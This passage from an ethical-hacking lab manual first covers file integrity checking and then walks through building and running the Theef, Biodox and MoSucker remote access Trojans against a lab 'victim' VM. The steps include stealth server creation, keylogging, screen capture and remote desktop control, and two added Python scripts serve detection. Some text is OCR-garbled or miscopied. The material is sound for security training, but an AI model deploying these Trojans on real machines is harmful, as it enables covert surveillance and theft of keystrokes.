googletalk.exe | Google Talk               | C:\Program Files...
EMP_UD.exe     | EPSON USB Display         | C:\Program Files...
Reader_sl.exe  | Adobe Acrobat S...        | C:\Program Files...
AdobeARM.exe   | Adobe Reader a...         | C:\Program Files...
igfxtray.exe   | igfxTray Module           | C:\Windows\syst...
hkcmd.exe      | hkcmd Module              | C:\Windows\syst...
igfxpers.exe   | persistence Module        | C:\Windows\syst...]
FIGURE 8.29: jv16 Startup Manager Dialogue.
28. Click the Registry Tools menu to view the registry icons.
Use Hide Microsoft Entries or Hide Windows Entries in the Autoruns Options menu to help you identify software that's been added to a system since installation. Autoruns prefixes the name of an image's publisher with "(Not verified)" if it cannot verify a digital signature for the file that's trusted by the system.

[Screenshot: jv16 PowerTools 2012, Registry Tools page: Registry Manager, Registry Compactor, Registry Finder, Registry Find & Replace, Registry Information, Registry Monitor, Registry Cleaner. Registry Health 100%. Trial Reminder: "You are using the free trial version of jv16 PowerTools. Click here to buy the real version!"]
FIGURE 8.30: jv16 Registry tools.
29. Click File Tools to view the file icons.
The Hide Windows Entries option omits images signed by Windows if Verify Signatures is selected. If Verify Signatures is not selected, Hide Windows Entries omits images that have Microsoft in their resource's company name field and reside beneath the %SystemRoot% directory.
FIGURE 8.31: jv16 File tools.
30. Click System Tools to view the system icons.

[Screenshot: jv16 PowerTools 2012, System Tools page: Software Uninstaller, Startup Manager, Service Manager, System Optimizer, Start Menu Tool, Automation Tool. Registry Health 100%.]
Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors.
FIGURE 8.32: jv16 System tools.
31. Click Privacy Tools to view the privacy icons.

[Screenshot: jv16 PowerTools 2012, Privacy Tools page: History Cleaner, Disk Wiper.]
FIGURE 8.33: jv16 Privacy tools.
32. Click Backups in the menu to display the Backup Tool dialog box.

[Screenshot: jv16 PowerTools 2012 [W8-x64] - Backup Tool. Tabs: Registry Backups, File Backups, Other Backups. Columns: Description, Type, Size, ID, Created. One File Backups entry: "Clean and Data removed", 34.6 KB, ID 00062D, created 21.09.2012.]
FIGURE 8.34: jv16 Backup tool.
33. Go to the Windows Server 2012 virtual machine.
TASK 5: FsumFrontEnd
34. Double-click FsumFrontEnd.exe, the executable file located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\Fsum Frontend.
35. The Fsum Frontend main window is shown in the following screenshot.

[Screenshot: Fsum Frontend v1.5.5.1. Left tree: Fsum Frontend > Tools > Calculate hashes (File, Text), Verify checksum files, Generate checksum files, Options, About. Methods (96) pane listing the available algorithms, among them adler32, ap hash, crc8, crc16, crc16_ccitt, crc16_ibm, crc16_xmodem, crc16_zmodem, crc32, crc32_bzip2, crc32_jamcrc, crc32_mpeg2, crc64, crc64_ecma, djb hash, edonkey, fletcher8, fletcher16 and fletcher32. Hash field, Encoding: Base 16 (hexadecimal), Log, Compare. Website: http://fsumfe.sourceforge.net]
CEH-Tools are also located on the mapped network drive (Z:) of the virtual machines.
FIGURE 8.35: FsumFrontEnd main window.
36. Select the type of hash that you want, say md5: check the md5 check box.

[Screenshot: Fsum Frontend v1.5.5.1, Methods (1/96) with md5 checked. Other methods visible include haval224 (3/4/5), haval256 (3/4/5), jhash, md2, md4, panama, pjw32, ripemd128, ripemd160, ripemd256, ripemd320, rshash, sdbm, sha0, sha1, sha2 (224), sha2 (256), sha2 (384), sha2 (512), snefru2 128 (4/8), snefru2 256 (4/8) and an HMAC option. Encoding: Base 16 (hexadecimal).]
FIGURE 8.36: FsumFrontEnd checking md5.
37. Select a file by clicking the File browse button; from the desktop, choose Test.txt.
Have Autoruns automatically execute an Internet search in your browser by selecting Search Online in the Entry menu.

[Screenshot: Fsum Frontend v1.5.5.1 with md5 selected; the Hash/File field and its browse button are shown.]
FIGURE 8.37: FsumFrontEnd file browse.
Autoruns displays the text "(Not verified)" next to the company name of an image that either does not have a signature or has a signature that is not signed by a certificate root authority on the list of root authorities trusted by the system.

[Screenshot: file open dialog on the Desktop: Google Chrome (shortcut, 2.11 KB), Firefox (shortcut, 1.06 KB), Test (text document, 0 bytes). Filename: Test.]
FIGURE 8.38: Fsum Frontend file open.
38. Click Add Folder to select a folder to be added to the hash, for example, D:\CEH-Tools.

[Screenshot: Fsum Frontend v1.5.5.1 with the File field pointing at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\fsumfrontend-1.5.5.1; Encoding: Base 16 (hexadecimal).]
FIGURE 8.39: FsumFrontEnd Add Folder.

[Screenshot: Browse For Folder dialog opened at D:\CEH-Tools\...\Files and Folder Integrity Checker\fsumfrontend-1.5.5.1, showing Administrator, Computer, Local Disk (C:) and Local Disk (D:).]
A "Hide Signed Microsoft Entries" option helps you to zoom in on third-party auto-starting images that have been added to your system.
FIGURE 8.40: FsumFrontEnd Adding Folder.
39. The files of the selected folder are listed in a list box.

[Screenshot: Fsum Frontend v1.5.5.1 with md5 selected; the File field shows a file under D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\fsumfrontend-1.5.5.1, and the file list is populated with entries under D:\CEH-Tools (Thumbs.db and several "CEHv8 Lab Prere..." files). Encoding: Base 16 (hexadecimal).]
FIGURE 8.41: FsumFrontEnd files list.
40. Click Generate checksum files. The progress bar shows the percentage complete for the hash files being generated.

[Screenshot: Fsum Frontend v1.5.5.1, Generate checksum files selected; the File field points at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Files and Folder Integrity Checker\fsumfrontend-1.5.5.1; Encoding: Base 16 (hexadecimal); the file list is populated.]
FIGURE 8.42: FsumFrontEnd Generate checksum files.

[Screenshot: Fsum Frontend *27%: the title bar shows the progress percentage while md5 digests are computed for each file. The Log pane shows the md5 result for C:\Users\Administrator\Desktop\Test.txt: D41D8CD98F00B204E9800998ECF8427E. Test.txt is 0 bytes, so this is the MD5 of empty input, a handy sanity check of the tool.]
You can also use the -e command-line option to launch Autoruns with administrative rights.
FIGURE 8.43: FsumFrontEnd progress of hash files.
41. The following is the list of md5 files after completion.
FIGURE 8.44: FsumFrontEnd list of hash files.
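Steps 34 to 41 use Fsum Frontend to hash a folder and write checksum files so that a later run can reveal any file that was replaced, which is exactly what a Trojan that overwrites a legitimate binary does. The script below is an added example, not part of the lab or of Fsum Frontend, that does the same job without the GUI: it walks a folder, writes a manifest in the "<digest> *<relative path>" form used by md5sum and sha256sum, and on a later run reports modified, missing and added files. The demo builds a constructed folder in a temporary directory (including a 0-byte Test.txt as in the lab), baselines it, then swaps one binary for a "trojanized" version, drops a new DLL and deletes a file; all file names and contents are made up. It hashes with SHA-256 by default and computes the md5 of the empty Test.txt only to reproduce the D41D8CD9... value seen in Figure 8.43. Two caveats a practitioner would add: MD5 collisions are practical, so use SHA-256 for integrity baselines, and a manifest stored on the monitored host is only as trustworthy as that host, so keep it (or a signature over it) somewhere the machine cannot write.

```python
"""Folder integrity baseline and verification (added example; not part of the
lab manual or of Fsum Frontend).  Hashes every file under a directory, writes
a md5sum/sha256sum-style manifest, and later reports what changed."""
import hashlib
import os
import tempfile

CHUNK = 1 << 16  # read files in 64 KiB pieces so large binaries do not fill memory


def hash_file(path, algo="sha256"):
    """Hex digest of one file using any algorithm hashlib knows (md5, sha256, ...)."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def generate_checksums(root, algo="sha256"):
    """Map each regular file under root (forward-slash relative path) to its digest."""
    sums = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            sums[rel] = hash_file(full, algo)
    return sums


def dump_manifest(sums):
    """Serialise as '<digest> *<path>' lines; '*' marks binary mode, as sha256sum does."""
    return "".join(f"{digest} *{rel}\n" for rel, digest in sorted(sums.items()))


def load_manifest(text):
    """Parse the manifest back; digests are compared case-insensitively."""
    sums = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, _, rel = line.partition(" ")  # path may itself contain spaces
        sums[rel.lstrip("*")] = digest.lower()
    return sums


def verify_tree(root, manifest, algo="sha256"):
    """Compare the folder with a saved manifest and classify every difference."""
    current = generate_checksums(root, algo)
    expected = load_manifest(manifest)
    return {
        "modified": sorted(p for p in expected if p in current and current[p] != expected[p]),
        "missing": sorted(p for p in expected if p not in current),
        "added": sorted(p for p in current if p not in expected),
    }


def demo():
    """Constructed folder: baseline it, then simulate a Trojan tampering with it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "tool.exe"), "wb") as f:
            f.write(b"MZ original tool bytes (constructed)")
        with open(os.path.join(root, "README.txt"), "wb") as f:
            f.write(b"constructed sample text")
        open(os.path.join(root, "Test.txt"), "wb").close()  # 0-byte file, as in the lab

        manifest = dump_manifest(generate_checksums(root))      # the trusted baseline
        empty_md5 = hash_file(os.path.join(root, "Test.txt"), "md5")

        # Tampering: replace the binary, drop a new DLL, delete a file.
        with open(os.path.join(root, "bin", "tool.exe"), "wb") as f:
            f.write(b"MZ trojanized tool bytes (constructed)")
        with open(os.path.join(root, "bin", "helper.dll"), "wb") as f:
            f.write(b"MZ dropped payload (constructed)")
        os.remove(os.path.join(root, "README.txt"))

        return verify_tree(root, manifest), empty_md5


if __name__ == "__main__":
    result, empty_md5 = demo()
    print("changes:", result)
    print("md5 of the empty Test.txt:", empty_md5)
```

The verification reports bin/tool.exe as modified, README.txt as missing and bin/helper.dll as added, and the md5 of the empty file comes out as d41d8cd98f00b204e9800998ecf8427e, matching the digest in Figure 8.43. To baseline a real folder, call generate_checksums on it, save the output of dump_manifest off-host, and run verify_tree against that saved text on every check.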
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
P L E A S E T AL A L K TO T O Y O U R I N S T R U C T O R I F Y O U H A VE VE Q U E S T I O N S RELATED TO THIS LAB.
Questions 1. Scenario: Alice wants to t o use TC P View to keep an eye 011 external connections. However, sometimes there are large numbers of connections with a Remote Address of "localliost:####". These entnes do not tell Alice anything of interest, and the large quantity of entnes caused useful entries entries to be pushed out of view. view. 2. Is there there any way to filte filterr out the the "l oc allio st:# ## #" Remote Address Address entries? 3. Evaluate wh at are the other othe r detail detailss displayed displayed by “autoruns” “auto runs” and an d analyze analyze the working o f autonuis tool. 4. Evaluate the the other options of Jv l6 Power Powe r Too l and analyz analyzee the result. result. 5. Evaluate Evaluate and list list die algonduns diat Fsu mF rontEn d supports. supports. Internet Connection R equired □
☐ Yes
☑ No
Platform Supported
☑ Classroom
☑ iLabs
Creating a Server Using the Theef
Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.
Lab Scenario
A backdoor Trojan provides remote, usually surreptitious, access to affected systems. A backdoor Trojan may be used to conduct distributed denial-of-service (DDoS) attacks, or it may be used to install additional Trojans or other forms of malicious software. For example, a backdoor Trojan may be used to install a downloader or dropper Trojan, which may in turn install a proxy Trojan used to relay spam, or a keylogger Trojan, which monitors and sends keystrokes to remote attackers. A backdoor Trojan may also open ports on the affected system and thus potentially lead to further compromise by other attackers. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, stealing of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
Lab Environment
To carry this out, you need:
■ Theef tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.
Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows Server 2008 Virtual Machine and navigate to Z:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.
2. Double-click Server210.exe to run the Trojan on the victim's machine.
FIGURE 8.1: Windows Server 2008 - Theef Folder
3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
FIGURE 8.2: Windows Server 2008 - Security Warning
4. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\Remote Access Trojans (RAT)\Theef.
5. Double-click Client210.exe to access the victim machine remotely.
FIGURE 8.3: Windows 8 - Running Client210.exe
6. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
FIGURE 8.4: Windows 8 - Security Warning
7. The main window of Theef appears, as shown in the following screenshot.
FIGURE 8.5: Theef Main Screen
8. Enter an IP address in the IP field, and leave the Port and FTP fields at their defaults.
9. In this lab we are attacking Windows Server 2008 (10.0.0.13). Click Connect after entering the IP address of Windows Server 2008.
FIGURE 8.6: Theef Connecting to Victim Machine
10. Now in Windows 8 you have access to view the Windows Server 2008 machine remotely.
[15:05:31] Attempting connection with 10.0.0.13
[15:05:31] Connection established with 10.0.0.13
[15:05:31] Connection accepted
[15:05:31] Connected to transfer port
Connected to server
FIGURE 8.7: Theef Gained Access to Victim Machine
11. To view the computer information, click the Computer icon at the bottom of the window.
12. In Computer Information, you are able to view PC Details, OS Info, Home, and Network by clicking on the respective buttons.
FIGURE 8.8: Theef Computer Information
13. Click the Spy icon to capture screens, keyloggers, etc. of the victim's machine.
FIGURE 8.9: Theef Spy
14. Select Keylogger to record the keystrokes of the victim.
15. In the Keylogger window, click the Play button to record the keystrokes.
FIGURE 8.9: Theef Keylogger Window
16. Now go to Windows Server 2008 and type some text in Notepad to record the keystrokes.
Keylogger [Started]
[New Text Document.txt - Notepad] HiBob{BACKSPACE}{BACKSPACE}{BACKSPACE} Billy U have been hacked by the world famouse {BACKSPACE} hacker.{CTRL}{CTRL}{ALT}
FIGURE 8.10: Theef Recorded Keystrokes
17. Similarly, you can access the details of the victim's machine by clicking the respective icons.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
Tool/Utility: Theef
Information Collected/Objectives Achieved: Output: victim's machine PC information; victim's machine keystrokes
Questions
1. Is there any way to filter out the "localhost:####" remote address entries?
2. Evaluate the other details displayed by "autoruns" and analyze the working of the autoruns tool.
Internet Connection Required
☐ Yes
☑ No
Platform Supported
☑ Classroom
☑ iLabs
Creating a Server Using the Biodox
Theef is a Windows-based application for both the client and server end. The Theef server is a virus that you install on your victim's computer, and the Theef client is what you then use to control the virus.
Lab Scenario
You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
Lab Environment
To carry this out, you need:
■ Biodox tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.
Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
2. Double-click BIODOX OE Edition.exe to run the Trojan on the victim's machine.
FIGURE 9.1: Windows 8 - Biodox Contents
3. In the Open File - Security Warning window, click Run, as shown in the following screenshot.
FIGURE 9.2: Windows 8 - Security Warning
4. Select your preferred language from the drop-down list in the Biodox main window; in this lab we have selected English.
FIGURE 9.3: Windows 8 - Biodox main window language selection
5. Now click the Server Editor button to build a server, as shown in the following screenshot.
FIGURE 9.4: Windows 8 - Security Warning
6. In Server Editor options, enter a victim's IP address in the IP/DNS field; in this lab we are using Windows Server 2008 (10.0.0.13).
7. Leave the rest of the settings at their defaults; to build a server, click the Create Server button.
Note: IP addresses may differ in your classroom labs.
FIGURE 9.5: Biodox Main Screen
8. A server.exe file will be created in its default directory: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan.
FIGURE 9.5: Biodox services
9. Now switch to the Windows Server 2008 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\Biodox Trojan to run the server.exe file.
FIGURE 9.6: Biodox server.exe
10. Double-click server.exe in the Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
FIGURE 9.7: Run the tool
11. Now switch to the Windows 8 Virtual Machine and click the active/deactive status button to see the connected machines.
FIGURE 9.8: Biodox open source editor
12. After getting connected, you can view the connected victims as shown in the following screenshot.
FIGURE 9.9: Biodox open source editor
13. Now you can perform actions with the victim by selecting the appropriate action tab in the left pane of the Biodox window.
14. Now click the settings manager option to view the applications running and other application settings.
FIGURE 9.9: Biodox open source editor
15. You can also record screenshots of the victim by clicking the Screen Capture button.
16. Click the Start Screen Capture button to capture screenshots of the victim's machine.
FIGURE 9.10: Screen capture
17. Biodox displays the captured screenshot of the victim's machine.
FIGURE 9.11: Screen capture
18. Similarly, you can access the details of the victim's machine by clicking the respective functions.
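The Theef and Biodox sessions above are built on fixed default ports (Theef 6703 and 2968, Biodox 6661 to 6664). As an added defender-side example, not part of the lab manual or of either tool, the following Python script parses `netstat -ano` output, drops the loopback-only rows that the earlier TCPView question describes as noise, and flags the PIDs bound to or talking to those ports; the netstat lines and the host 10.0.0.10 are constructed.

```python
"""Flag processes that listen on, or talk to, the default ports of the Theef and
Biodox servers built in these labs.  Added example: the port numbers come from
the lab screenshots, the netstat rows below are constructed sample data."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Default ports shown in the lab.  Both tools let the operator change them,
# so a hit is a lead for the analyst, not proof of infection.
RAT_DEFAULT_PORTS: Dict[int, str] = {
    6703: "Theef connect port",
    2968: "Theef FTP (transfer) port",
    6661: "Biodox connection port",
    6662: "Biodox transfer port",
    6663: "Biodox screen capture port",
    6664: "Biodox webcam capture port",
}

# Constructed `netstat -ano` sample from the Windows Server 2008 victim
# (10.0.0.13) after Server210.exe started and the client connected.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       700
  TCP    0.0.0.0:6703           0.0.0.0:0              LISTENING       1824
  TCP    0.0.0.0:2968           0.0.0.0:0              LISTENING       1824
  TCP    10.0.0.13:6703         10.0.0.10:49213        ESTABLISHED     1824
  TCP    127.0.0.1:49155        127.0.0.1:6664         ESTABLISHED     2100
  TCP    10.0.0.13:49300        203.0.113.5:443        ESTABLISHED     1412
  UDP    0.0.0.0:500            *:*                                    820
"""

@dataclass
class Conn:
    proto: str
    local_host: str
    local_port: int
    remote_host: str
    remote_port: int
    state: str   # empty for UDP rows, which carry no state column
    pid: int

# TCP rows have a state column, UDP rows do not; the PID is always last.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")

def split_endpoint(endpoint: str):
    """'10.0.0.13:6703' -> ('10.0.0.13', 6703); '[::1]:80' -> ('::1', 80); '*:*' -> ('*', 0)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else 0)

def parse_netstat(text: str) -> List[Conn]:
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header line or anything that is not a connection row
        proto, local, remote, state, pid = m.groups()
        lh, lp = split_endpoint(local)
        rh, rp = split_endpoint(remote)
        conns.append(Conn(proto, lh, lp, rh, rp, state or "", int(pid)))
    return conns

def is_loopback(host: str) -> bool:
    return host in ("::1", "localhost") or host.startswith("127.")

def find_rat_indicators(conns: List[Conn], ignore_loopback: bool = True) -> List[dict]:
    """One finding per row whose local or remote port is a known RAT default."""
    findings = []
    for c in conns:
        # The 'localhost:####' rows from the TCPView question: host-internal traffic.
        if ignore_loopback and is_loopback(c.local_host) and is_loopback(c.remote_host):
            continue
        if c.local_port in RAT_DEFAULT_PORTS:
            port = c.local_port
            role = "listener" if c.state.upper() == "LISTENING" else "session"
        elif c.remote_port in RAT_DEFAULT_PORTS:
            port = c.remote_port
            role = "client"  # this host is the side dialing a RAT server port
        else:
            continue
        findings.append({"pid": c.pid, "proto": c.proto, "port": port, "role": role,
                         "peer": c.remote_host, "label": RAT_DEFAULT_PORTS[port]})
    return findings

def pids_to_investigate(findings: List[dict]) -> List[int]:
    """Distinct PIDs to look up in Task Manager / autoruns, sorted."""
    return sorted({f["pid"] for f in findings})

if __name__ == "__main__":
    hits = find_rat_indicators(parse_netstat(SAMPLE_NETSTAT))
    for h in hits:
        print(f"PID {h['pid']:>5} {h['proto']} port {h['port']} ({h['role']}): "
              f"{h['label']}, peer {h['peer']}")
    print("Investigate PIDs:", pids_to_investigate(hits))
```

Run `netstat -ano` on the suspected victim and feed its output to `parse_netstat` in place of the constructed sample; the flagged PIDs are the ones to cross-check against the process list and autorun entries.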
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
Tool/Utility: Biodox
Information Collected/Objectives Achieved: Output: record the screenshots of the victim machine
Internet Connection Required
☐ Yes
☑ No
Platform Supported
☑ Classroom
☑ iLabs
Creating a Server Using the MoSucker
MoSucker is a Visual Basic Trojan. MoSucker's edit server program has a client with the same layout as SubSeven's client.
Lab Scenario
A backdoor is a secret or unauthorized channel for accessing a computer system. In an attack scenario, hackers install backdoors on a machine, once compromised, to access it in an easier manner at later times. With the growing use of e-commerce, web applications have become the target of choice for attackers. With a backdoor, an attacker can virtually have full and undetected access to your application for a long time. It is critical to understand the ways backdoors can be installed and to take the required preventive steps. You are a security administrator of your company, and your job responsibilities include protecting the network from Trojans and backdoors, Trojan attacks, theft of valuable data from the network, and identity theft.
Lab Objectives
The objective of this lab is to help students learn to detect Trojan and backdoor attacks.
Note: Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors
The objectives of the lab include:
■ Creating a server and testing the network for attack
■ Detecting Trojans and backdoors
■ Attacking a network using sample Trojans and documenting all vulnerabilities and flaws detected
Lab Environment
To carry this out, you need:
■ MoSucker tool located at D:\CEH-Tools\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker
■ A computer running Windows Server 2012 as host machine
■ A computer running Windows 8 Virtual Machine (Attacker)
■ Windows Server 2008 running in Virtual Machine (Victim)
■ A web browser with Internet access
■ Administrative privileges to run tools
Lab Duration Time: 20 Minutes
Overview of Trojans and Backdoors
A Trojan is a program that contains malicious or harmful code inside apparently harmless programming or data in such a way that it can get control and cause damage, such as ruining the file allocation table on a hard drive.
Note: The versions of the created client or host and the appearance of the website may differ from what is shown in the lab, but the actual process of creating the server and the client is the same as shown in this lab.
Lab Tasks
TASK 1: Create Server with ProRat
1. Launch Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker.
2. Double-click the CreateServer.exe file to create a server.
FIGURE 10.1: Install CreateServer.exe
3. In the Open File - Security Warning dialog box, click Run.
CEH L ab Manual Page 507 507
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
[Dialog: Open File - Security Warning. The publisher could not be verified. Are you sure you want to run this software? Name: ...Trojans Types\GUI Trojans\MoSucker\CreateServer.exe; Publisher: Unknown Publisher; Type: Application; From: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans T... This file does not have a valid digital signature that verifies its publisher. You should only run software from publishers you trust.]
FIGURE 10.2: Install createServer.exe
Tools demonstrated in this lab are available in D:\CEHTools\CEHv8 Module 06 Trojans and Backdoors
4. The MoSucker Server Creator/Editor window appears; leave the default settings and click OK.
[Dialog: MoSucker 3.0 Server Creator/Editor. Options: I want to create a stealth trojan server for a victim; Include Msvbvm60.dll in your MoSucker server (adds 750 KB); Include mswinsock.ocx in your server (adds 50 KB); Pack for minimal file size (Recommended); MoSucker Transport Cipher Key; I want to create a visible server for local testing; I want to edit an existing server; Start configuration after creating the server.]
FIGURE 10.3: Install createServer.exe
5. Use the file name server.exe, save it in the same directory, and click Save.
FIGURE 10.4: Save Server.exe
6. MoSucker will generate a server with the complete settings in the default directory.
[Dialog: MoSucker 3.0 - Generating server... 100% complete. Build Info: MoSucker 3.0 Public Release B; Level Accessed: Public; UPX; Verifying necessary filepaths; Preparing first stub; Preparing second stub; Packing first stub; Packing second stub; Modifying file headers.]
FIGURE 10.5: Install server progress
7. Click OK in the Edit Server pop-up message.
[Dialog: Edit Server 3.0 - Server created successfully! Server size: 158 KB. Do not repack server.]
FIGURE 10.6: Server created successfully
8. In the MoSucker wizard, change the Victim's Name to Victim or leave all the settings as their defaults.
[Dialog: MoSucker 3.0, Name/Port/Password page. Fields: Selected Server, Server ID, Cypher Key, Victim's Name, Server Name(s), Extension(s), Connection Port; option "Prevent same server multi-infections (recommended)"; note "You may select a windows icon to associate with your custom file extension/s."; pages Notification 1, Notification 2, Options, Keylogger, Plug-ins, Fake Error, File Properties; buttons Read, Save, Close.]
FIGURE 10.7: Give the victim machine details
9. Now click Keylogger in the left pane, check the Enable off-line keylogger option, and then click Save.
10. Leave the rest of the settings as their defaults.
[Dialog: MoSucker 3.0, Keylogger page. Enable off-line keylogger; Log Filename; Enable Smart Logging; Capture key words to trigger keylogger (separate each with a comma); buttons Read, Save, Close.]
FIGURE 10.8: Enable the keylogger
11. Click OK in the EditServer pop-up message.
[Dialog: MoSucker EditServer 3.0 - Server saved successfully. Final server size: 158 KB.]
FIGURE 10.9: Server save file
12. Now switch to Windows Server 2008 Virtual Machine, and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to run the server.exe file.
FIGURE 10.10: Click server.exe
13. Double-click server.exe in Windows Server 2008 virtual machine, and click Run in the Open File - Security Warning dialog box.
[Dialog: Open File - Security Warning. The publisher could not be verified. Name: ...s\Trojans Types\GUI Trojans\MoSucker\server.exe; Publisher: Unknown Publisher; Type: Application; From: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojan... This file does not have a valid digital signature that verifies its publisher.]
FIGURE 10.11: Click Run
14. Now switch to Windows 8 Virtual Machine and navigate to Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans Types\GUI Trojans\MoSucker to launch MoSucker.exe.
15. Double-click MoSucker.exe.
FIGURE 10.12: Click MoSucker.exe
16. In the Open File - Security Warning dialog box, click Run to launch MoSucker.
[Dialog: Open File - Security Warning. The publisher could not be verified. Name: ...rs\Trojans Types\GUI Trojans\MoSucker\MoSucker.exe; Publisher: Unknown Publisher; Type: Application; From: Z:\CEHv8 Module 06 Trojans and Backdoors\Trojans T... This file does not have a valid digital signature that verifies its publisher.]
FIGURE 10.13: Run the application
17. The MoSucker main window appears, as shown in the following figure.
[MoSucker main window: IP address and port fields, Connect button; left pane entries Misc stuff, Information, File related, System, Spy related, Fun stuff I, Fun stuff II, Live capture.]
FIGURE 10.14: MoSucker main window
18. Enter the IP address of the victim and the port number as you noted at the time of server configuration, and then click Connect.
19. In this lab, we have noted Windows Server 2008 virtual machine's IP address (10.0.0.13) and port number 4288.
Note: These might differ in your classroom labs.
FIGURE 10.15: connect to victim machine
20. Now the Connect button automatically turns to Disconnect after getting connected with the victim machine, as shown in the following screenshot.
FIGURE 10.16: connection established
21. Now click Misc stuff in the left pane, which shows different options that an attacker can use to perform actions from his or her system.
FIGURE 10.17: Setting server options
22. You can also access the victim's machine remotely by clicking Live capture in the left pane.
23. In the Live capture option click Start, which will open the remote desktop of the victim's machine.
[MoSucker window: Misc stuff page with Make screenshot and JPEG Quality (20% to 90%); Live capture entry with Start and Settings.]
FIGURE 10.18: Start capturing
24. The remote desktop connection of the victim's machine is shown in the following figure.
[Window: Remote administration mode. RA mode options: Resize window to 4:3, JPG Quality, Delay in ms (1000), Send mouseclicks, Send pressed keys, Send mousemoves, AutoUpdate pics, Fullscreen.]
FIGURE 10.19: Capturing victim machine
25. You can access files, modify the files, and so on in this mode.
FIGURE 10.20: capturing victim machine
26. Similarly, you can access the details of the victim's machine by clicking the respective functions.
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure through public and free information.
